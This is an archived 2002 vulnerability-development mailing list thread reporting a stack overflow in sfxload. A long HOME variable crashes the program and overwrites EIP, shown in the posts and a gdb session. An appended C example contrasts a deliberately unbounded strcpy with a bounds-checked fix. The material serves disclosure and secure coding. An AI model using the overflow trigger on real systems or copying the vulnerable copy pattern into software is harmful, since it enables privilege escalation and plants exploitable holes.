Vulnerability Development mailing list archives

Re: sfxload issues.


From: "Gabriel A. Maggiotti" <gmaggiot () ciudad com ar>
Date: Thu, 3 Jan 2002 17:53:30 -0300

I successfully reproduced it on my box:

<quote>
[root@tribilin /root]# cat /etc/issue

Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22 on an i586

[root@tribilin /root]# export HOME=`perl -e 'print "A" x 10235'`
[root@tribilin /root]# ./sfxload
Segmentation fault (core dumped)
</quote>

Regards,
Gabriel A. Maggiotti

Email:       gmaggiot () ciudad com ar
Webpage: http://qb0x.net


----- Original Message -----
From: "l0rt" <simon () snosoft com>
To: <vuln-dev () securityfocus com>
Sent: Wednesday, January 02, 2002 5:53 PM
Subject: sfxload issues.



Vendor : http://members.tripod.de/iwai/awedrv.html
Program: sfxload
OS     : RH 7.1
Version: 0.4.3
SUID   : No
SGID   : No
Issue  : This may get called by a suid helper binary, which would allow
a normal user to gain some more privs.

--------------------------------------------------------------------------

Details:
[raven] /u1/cores/testing/bin> export HOME=`perl -e 'print "A" x 10235'`

/* I just set HOME to be [10235] A's */

[raven] /u1/cores/testing/bin> sfxload
Segmentation fault (core dumped)

/* When sfxload is run it reads in the HOME var and cores!!! */

[raven] /u1/cores/testing/bin/sfxload> gdb /bin/sfxload  /* gdb */
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
(gdb) core core
Core was generated by `AAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/i686/libm.so.6...done.
Loaded symbols for /lib/i686/libm.so.6
Reading symbols from /lib/i686/libc.so.6...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()
(gdb) bt
#0  0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb)

/* EIP gets killed */




--
Regards,
l0rt

------------------------------------------------------------
"The only way to get rid of temptation is to give in to it."
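The thread does not show which function in sfxload copies HOME, only that a 10235-byte value lands in the saved return address (EIP = 0x41414141, i.e. "AAAA"). The following is an added C example, not sfxload's code, that shows the kind of pattern this crash signature implies: an environment value copied into a fixed-size stack buffer without a bound, next to a hardened version that checks the length first and formats with snprintf. The buffer size, the rc filename and the function names are assumptions made for illustration; the 10235-byte string reproduces the `perl -e 'print "A" x 10235'` value from the posts.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed buffer size; sfxload's real size is not given in the thread. */
#define PATH_MAX_LEN 256

/* VULNERABLE pattern (illustration only): the environment value is copied
 * with no length check. A HOME longer than buf runs past the end of the
 * stack frame and overwrites the saved return address, which is what the
 * posted core shows as EIP = 0x41414141. Only ever called below with a
 * short value, never with the 10235-byte one. */
int build_rc_path_unsafe(const char *home, char *out)
{
    char buf[PATH_MAX_LEN];
    strcpy(buf, home);              /* unbounded copy of attacker-controlled data */
    strcat(buf, "/.sfxloadrc");     /* assumed filename, illustration only */
    strcpy(out, buf);
    return 0;
}

/* Hardened form: reject values that cannot fit, then format with a bound.
 * Returns 0 on success, -1 if the input would not fit in out. */
int build_rc_path_safe(const char *home, char *out, size_t outlen)
{
    const char *suffix = "/.sfxloadrc";   /* same assumed filename */
    if (home == NULL || out == NULL || outlen == 0)
        return -1;
    /* +1 for the terminating NUL */
    if (strlen(home) + strlen(suffix) + 1 > outlen)
        return -1;                        /* too long: refuse instead of overflowing */
    int n = snprintf(out, outlen, "%s%s", home, suffix);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return 0;
}

/* Construct the same HOME value the report uses (len bytes of 'A').
 * Caller frees the result. */
char *make_long_home(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}

int main(void)
{
    char out[PATH_MAX_LEN];
    char *evil = make_long_home(10235);   /* constructed input, as in the post */
    if (evil == NULL)
        return 1;

    /* Benign value: both versions produce the same path. */
    build_rc_path_unsafe("/root", out);
    printf("unsafe, short HOME:  %s\n", out);
    if (build_rc_path_safe("/root", out, sizeof out) == 0)
        printf("safe, short HOME:    %s\n", out);

    /* Hostile value: the safe version rejects it. The unsafe version would
     * smash the stack here, so it is deliberately not called. */
    if (build_rc_path_safe(evil, out, sizeof out) != 0)
        printf("safe, %zu-byte HOME: rejected\n", strlen(evil));

    /* Reading HOME from the real environment, as sfxload does. */
    const char *home = getenv("HOME");
    if (home != NULL && build_rc_path_safe(home, out, sizeof out) == 0)
        printf("safe, real HOME:     %s\n", out);

    free(evil);
    return 0;
}
```

The practical point for the "suid helper" question raised in the original post: the binary itself is neither SUID nor SGID, so the overflow only crosses a privilege boundary if some privileged program execs sfxload while passing through the caller's environment. A helper that sanitises or resets HOME before the exec closes that path even without fixing the copy.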



